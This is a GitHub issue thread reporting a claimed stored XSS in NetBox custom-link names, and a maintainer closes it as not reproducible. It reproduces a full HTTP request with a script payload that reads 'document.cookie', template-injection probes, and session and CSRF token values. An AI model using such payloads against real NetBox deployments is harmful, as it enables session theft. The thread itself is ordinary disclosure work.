search

netbox-community / netbox

The premier source of truth powering network automation. Open source under Apache 2. Try NetBox Cloud free: https://netboxlabs.com/free-netbox-cloud/
http://netboxlabs.com/oss/netbox/
Apache License 2.0
16.18k stars 2.59k forks source link

XSS in api: /extras/custom-links/add, /extras/custom-links/{id}/edit/ both with param: name, /core/config-revisions/add/ with param: BANNER_MAINTENANCE #17596

Closed minhquan202 closed 1 month ago

minhquan202 commented 1 month ago

Deployment Type

NetBox Cloud

NetBox Version

v4.1.1

Python Version

3.10

Steps to Reproduce

1, Add or Edit a Custom Link with malicious script tags at param Name

2, Access Object Type using Custom Link

3, Immediately boom, Stored XSS is executed

Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost:8000/extras/custom-links/add/
Content-Type: multipart/form-data; boundary=---------------------------300193789523924448502163188369
Content-Length: 1589
Origin: http://localhost:8000
Connection: close
Cookie: csrftoken=GPFwHFgQsCVRlXGYb2Efv9gKs2SXEiIN; sessionid=jv3bmrc6goo62qohlkckic0eolv7nrde
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-PwnFox-Color: red
Priority: u=1

-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="csrfmiddlewaretoken"

oDVU0Umj4Oip7YXSKVBW5T4WgmBHvaJZUiqgxpsZmg36iLtGLN51qSawyejuZihC
-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="name"

<body onload= prompt(document.cookie)>
-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="object_types"

46
-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="weight"

100
-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="group_name"

-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="button_class"

outline-dark
-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="enabled"

-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="enabled"

on
-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="new_window"

-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="link_text"

{{7*7}}
-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="link_url"

{{7*7}}
-----------------------------300193789523924448502163188369
Content-Disposition: form-data; name="_create"

-----------------------------300193789523924448502163188369--

image

Expected Behavior

spam, csrf token hijacking, combined with other vulnerabilities to create a chain that harms the system

Observed Behavior

image

arthanson commented 1 month ago

@minhquan202 Thank you for opening a bug report. Unfortunately, the information you have provided is not sufficient for someone else to attempt to reproduce the reported behavior. Remember, each bug report must include detailed steps that someone else can follow on a clean, empty NetBox installation to reproduce the exact problem you're experiencing. These instructions should include the creation of any involved objects, any configuration changes, and complete accounting of the actions being taken. Also be sure that your report does not reference data on the public NetBox demo, as that is subject to change at any time by an outside party and cannot be relied upon for bug reports.

Can you please provide what script you are using and

minhquan202 commented 1 month ago

I just want to inform you that using mark_safe but lacking escape causes the application to have an XSS vulnerability. Let you fix it in the next updates. As for the steps, I have provided. Please read carefully and think about my bug report. Whether you fix this or not has nothing to do with me, this is for your users. All information has been presented by me in my bug report, please read carefully.

Vào Th 4, 25 thg 9, 2024 vào lúc 22:03 Arthur Hanson < @.***> đã viết:

@minhquan202 https://github.com/minhquan202 Thank you for opening a bug report. Unfortunately, the information you have provided is not sufficient for someone else to attempt to reproduce the reported behavior. Remember, each bug report must include detailed steps that someone else can follow on a clean, empty NetBox installation to reproduce the exact problem you're experiencing. These instructions should include the creation of any involved objects, any configuration changes, and complete accounting of the actions being taken. Also be sure that your report does not reference data on the public NetBox demo, as that is subject to change at any time by an outside party and cannot be relied upon for bug reports.

Can you please provide what script you are using and

— Reply to this email directly, view it on GitHub https://github.com/netbox-community/netbox/issues/17596#issuecomment-2374355991, or unsubscribe https://github.com/notifications/unsubscribe-auth/AVH2N6CTD7LTNL5XU26UN4TZYLGDVAVCNFSM6AAAAABOZS6UT6VHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDGNZUGM2TKOJZGE . You are receiving this because you were mentioned.Message ID: @.***>

arthanson commented 1 month ago

Closing as not enough information has been provided. I tried a simple script in name and Link Text and checked it on the Site page and did not see it activating. If reproduction steps can be included as specified in the response above then we can re-open and look at addressing.

minhquan202 commented 1 month ago

ok i will create ticket again and give you more clear information. ok?

Vào Th 5, 26 thg 9, 2024 vào lúc 02:56 Arthur Hanson < @.***> đã viết:

Closing as not enough information has been provided. I tried a simple script in name and Link Text and checked it on the Site page and did not see it activating. If reproduction steps can be included as specified in the response above then we can re-open and look at addressing.

— Reply to this email directly, view it on GitHub https://github.com/netbox-community/netbox/issues/17596#issuecomment-2375131706, or unsubscribe https://github.com/notifications/unsubscribe-auth/AVH2N6GFYAAZCPEHOBDS2UDZYMIPLAVCNFSM6AAAAABOZS6UT6VHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDGNZVGEZTCNZQGY . You are receiving this because you were mentioned.Message ID: @.***>